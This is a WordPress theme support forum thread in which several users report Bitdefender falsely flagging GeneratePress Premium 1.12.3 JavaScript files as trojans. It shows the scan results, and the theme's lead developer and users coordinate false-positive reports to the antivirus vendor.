[Resolved] Bitdefender blocks my GP sites as dangerous / infected – false positives

Home Forums Support [Resolved] Bitdefender blocks my GP sites as dangerous / infected – false positives

Home Forums Support Bitdefender blocks my GP sites as dangerous / infected – false positives

Viewing 15 posts - 1 through 15 (of 26 total)
  • Author
    Posts
  • #1630943
    TogaD

    Hi everyone,

    My apologies in advance for the long post! However, it’s a matter of great importance.

    I’m new to GP and just bought my Premium license last month after a couple years of using the Genesis platform. I’m extremely impressed and happy with GeneratePress so far! While I’m not a WP expert designer by any means and I have a colleague who is very WordPress savvy that helps me with each site, GP has given me more ability to control things that I would have normally had to rely on my colleague for a lot of custom CSS that I don’t have to even bother with when using GP Premium. Awesome πŸ™‚

    However, I’ve run into a major issue – a widely used computer security suite (Bitdefender Total Security) that I’ve used on my workstations for years is detecting each site that I switch to GP; as being “Infected” and “Dangerous” (even on fresh new clean installs of WP 5.6 with only default Twenty Twenty-One theme enabled before installing GP).

    This is most definitely an issue of false-positives, but since I’d have to submit each site URL to Bitdefender that I create using GP and wait 72 hours to get them removed from Bitdefender’s blocking list, I thought it best to bring it to the attention of GP devs (and other GP users here, just in case anyone else encounters this, but GP devs would have the best chance of communicating with Bitdefender devs in order to squash this critical issue).

    Before I dive into Bitdefender issue details:

    What I DO know is my servers and sysadmin maintenance.

    Server environment basics – cPanel (release tier for Production servers), CloudLinux OS, PHP 7.4, mySQL 7
    WordPress environment basics – Individual installs (not multi-site) of WP 5.6 with only a few plugins (WPForms Pro, iThemes Security Pro, SeedProd Pro)
    GP basics – theme version 3.0.2 / Premium plugin version 1.12.3

    The issue of Bitdefender detecting sites as infected / dangerous only happens on sites that I use GP on. All other sites I’ve done with my colleague using all the other frameworks / builders such as Genesis, Elementor, Divi, and a wide variety of other well-known themes pass Bitdefender’s detection with no issue.

    I’ve run CXS (Configserver Exploit Scanner) scans on the sites that I’ve used GP Premium on, and they are totally clean.

    I can also clearly see that they are all 100% clean on these important sites:

    https://sitecheck.sucuri.net – all sites “green” / safe

    https://www.virustotal.com – all sites “gree” / “No engines detected this URL”

    https://www.ssllabs.com/ssltest – all sites AND servers score A+

    With all that said and known, here’s what happens after I install GP (regardless of free or premium). I’ve removed the actual URL’s and replaced them with (website url) for privacy reasons.

    ———————-
    MESSAGE FROM BITDEFENDER

    Dangerous page blocked for your protection
    https:// (website url)

    Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.
    Infected web page detected!
    Feature: Online Threat Prevention

    (And that’s just upon visiting the sites without even logging-in … it gets worse when I ).

    Bitdefender blocked this dangerous page for your protection:

    https:// (website url) /wp-content/plugins/gp-premium/spacing/functions/customizer/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613884

    https:// (website url) /wp-content/plugins/gp-premium/typography/functions/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613846

    https:// (website url) /wp-content/plugins/gp-premium/colors/functions/js/customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613741

    https:// (website url) /wp-content/plugins/gp-premium/colors/functions/js/menu-plus-customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613906

    https:// (website url) /wp-content/plugins/gp-premium/blog/functions/js/controls.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613899

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/selectWoo.min.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613828

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/spacing-customizer.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613820

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/generatepress-controls.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613893

    https:// (website url) /wp-content/plugins/gp-premium/library/customizer/controls/js/selectWoo.min.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613828
    ——————-

    And a few more… you get the idea though. Seems that BD sees basically everything GP modifies / calls as a threat.

    I’m truly hoping that the team at GP can reach out to the team at BD and sort this, because I’m REALLY digging GP and I want to get away from all the other builders and make GP one of the main tools that I use for every site.

    Thanks for your patience with this “GP noob”!

    #1630953
    Tom

    I am another GP user who is getting Bitdefender warnings on my site tonight! Here is the Bitdefender warning:

    Infected web page detected
    now

    Feature:
    Online Threat Prevention

    We blocked this dangerous page for your protection:
    https://www.distanceenergywork.com/wp-content/plugins/gp-premium/sections/functions/metaboxes/js/generate-sections-metabox.js?ver=1.12.3
    Threat name: Trojan.GenericKD.45613695
    Dangerous pages attempt to install software that can harm the device, gather personal information or operate without your consent.

    #1630957
    TogaD

    Hi Tom, sorry to hear you’re going through the same thing but also semi-relieved to know it’s not just me.

    I have a feeling it might be to do with a Bitdefender update within the past 24 hours, because I’ve had these files on my computer for weeks and look what a full Bitdefender Total Security scan just deleted from within the gp-premium-1.12.3.zip file on my local Windows 10 Pro PC hard drive!

    Scan Results Summary

    Resolved issues

    Item path Threat Name Action taken

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/colors/functions/js/wc-customizer.js Trojan.GenericKD.45613745 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/colors/functions/js/customizer.js Trojan.GenericKD.45613741 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/blog/functions/js/controls.js Trojan.GenericKD.45613899 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/blog/functions/js/customizer.js Trojan.GenericKD.45613873 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/typography/functions/js/customizer.js Trojan.GenericKD.45613846 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/general/js/smooth-scroll.js Trojan.GenericKD.45613826 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/blog/functions/js/scripts.js Trojan.GenericKD.45613703 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/colors/functions/js/menu-plus-customizer.js Trojan.GenericKD.45613906 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/elements/assets/admin/metabox.js Trojan.GenericKD.45613827 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/alpha-color-picker/wp-color-picker-alpha.js Trojan.GenericKD.45613729 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/alpha-color-picker/wp-color-picker-alpha.min.js Trojan.GenericKD.45613836 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/customizer/controls/js/typography-customizer.js Trojan.GenericKD.45613754 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/customizer/controls/js/generatepress-controls.js Trojan.GenericKD.45613893 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/customizer/controls/js/selectWoo.min.js Trojan.GenericKD.45613828 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/page-header/functions/js/jquery.vide.min.js Trojan.GenericKD.45613818 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/library/customizer/controls/js/spacing-customizer.js Trojan.GenericKD.45613820 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/menu-plus/functions/js/offside.js Trojan.GenericKD.45613726 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/menu-plus/functions/js/sticky.js Trojan.GenericKD.45613806 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/page-header/functions/js/metabox.js Trojan.GenericKD.45613716 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/secondary-nav/functions/js/customizer.js Trojan.GenericKD.45613755 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/sections/functions/metaboxes/js/generate-sections-metabox-4.9.js Trojan.GenericKD.45613735 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/sections/functions/metaboxes/js/generate-sections-metabox.js Trojan.GenericKD.45613695 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/sites/assets/js/admin.js Trojan.GenericKD.45613760 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/sites/assets/js/download.js Trojan.GenericKD.45613713 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/spacing/functions/customizer/js/customizer.js Trojan.GenericKD.45613884 Deleted

    C:\Users\(path)\Wordpress Plugins\GENERATEPRESS\gp-premium-1.12.3.zip=>gp-premium/woocommerce/functions/js/woocommerce.js Trojan.GenericKD.45613710 Deleted

    The only thing I can find in common for the moment is that it is only detecting the .js files as infected.

    This is clearly something that can only be sorted out between BD and GP devs.

    #1630960
    Tom

    I’ll run the Bitdefender full scan now also. Thanks for that idea. Yes, it seems this must have been caused by something that GP did today. I was editing our website yesterday and all was well, but now, threat detections every time I try to edit any page on our website.

    #1630963
    TogaD

    PS Tom – in order to help get this issue resolved, as “end-users” we’re going to need to hound Bitdefender Support as much as possible in order for them to take any serious look into it on their end. If we team-up and start submitting support tickets about this to BD then they’ll start to look into it. If only one BD user reports this, it will get ignored. I’m opening a second ticket with them right now and providing more details. I hope you (and anyone else who encounters this) will do so as well. It’s the only way to get results with such large software companies. πŸ™

    #1630967
    TogaD

    PPS Tom – you know, you might be right about a change with GP. Perhaps the paths being called in the .js files appears to be associated with a site/server that has either been compromised or appears to be. I’m going to dig into the files on the server manually to see what I can spot, since trying to put the files back on my computer just ends up in Bitdefender deleting them as a detected Trojan.

    Thankfully we’re in this together. But so much for any sleep this weekend.. ugh…

    #1630984
    TogaD

    While I’m no coder, sifting through the GP plugin files on the server and viewing the code, so far I’m not seeing anything that should be construed as malicious or harmful. I haven’t discovered any direct paths / calls to “bad” servers, have not yet found any base64 obfuscation that would trigger anything, and the fact that my Exploit Scanner software on my servers see all the code as clean is another indicator to me that this is not likely a problem with GP’s code and more likely with Bitdefender’s detection rules. (Especially when considering all of the research I’ve documented in previous posts above).

    Crossing my fingers that someone from GP will notice this soon and assist in how we should approach BD. I was supposed to be launching an e-commerce site for a customer this weekend and this has stopped the project dead in the water.

    #1631118
    Marlon Faust

    I’ve got the same problem since today on all websites:

    /wp-content/plugins/gp-premium/colors/functions/js/menu-plus-customizer.js

    Trojan.GenericKD.45613906

    #1631609
    Tom
    Lead Developer
    Lead Developer

    Very strange indeed. These are all just regular javascript files using jQuery that haven’t changed in the theme at all recently (some haven’t for a few years).

    If you take these files and run them through any sort of virus software (Bitdefender excluded), they all pass just fine, as there’s nothing malicious in them whatsoever.

    This does seem to be something specific to Bitdefender – we’ll reach out today as well.

    The more people that report this to them, the faster they should want to resolve it.

    As I mentioned above, these are just standard javascript files using jQuery – there isn’t anything we can do on our end to “fix” the issue. It’s most certainly a false-positive on their end.

    Thanks!

    #1631650
    Tom

    Hi Tom, I have started a chat with Bitdefender support right now, explaining what is happening on our website.

    #1631652
    Tom
    Lead Developer
    Lead Developer

    Awesome, thank you! I also reached out via email.

    #1631792
    Tom

    The Bitdefender employee in the chat could not help me directly. He just referred me to this Bitdefender False Positive Form page: https://www.bitdefender.com/consumer/support/answer/40673/

    I filled it out twice for two suspect URLs, and suggest that everyone who is having problems with this issue fill out this form as many times as they wish.

    #1631841
    Tom
    Lead Developer
    Lead Developer

    I’ll report there as well. Their Twitter seems to direct people to bitsy@bitdefender.com for issues as well.

    As a test, I ran a handful of the files mentioned above through the following tool – all good: https://opentip.kaspersky.com/

    #1631921
    TogaD

    Bitdefender even blocked my access to https://generatepress.com until I added it as an exception (for now) in my Bitdefender Total Security settings.

    As user (not dev) Tom mentioned above, we should all submit these false-positives to BD at this link – https://www.bitdefender.com/consumer/support/answer/40673/

    And that’s not just for URL’s – you can also upload the files (like you can on virustotal.com) so I’m uploading the .js files from the GP Premium plugin at https://www.bitdefender.com/consumer/support/answer/40673/ as well.

    If we continue to join together and knock on their door about this, they will resolve it. I’ve been using BD for many years, and have reported false-positives before, and they usually resolve them in about 3 business days. But that’s just when one person alone submits a report. I imagine that if they get reports from multiple people for the same sites / same files, they’ll likely move faster to resolve the issue on their end.

    Yes it’s time-consuming to submit the reports, but BD is widely used (especially by my clientele) so it is very important that we all take action in order to clear GP from BD’s blocking / malware database.

    #1631924
    Tom
    Lead Developer
    Lead Developer

    I’ve sent them a couple of different emails to different areas, so hopefully they’ll get back to us by tomorrow. Definitely frustrating that something like this can happen – I’m assuming it should be an easy fix on their end.

    Thanks again for reporting it to them as well – really appreciate it πŸ™‚

Viewing 15 posts - 1 through 15 (of 26 total)
  • You must be logged in to reply to this topic.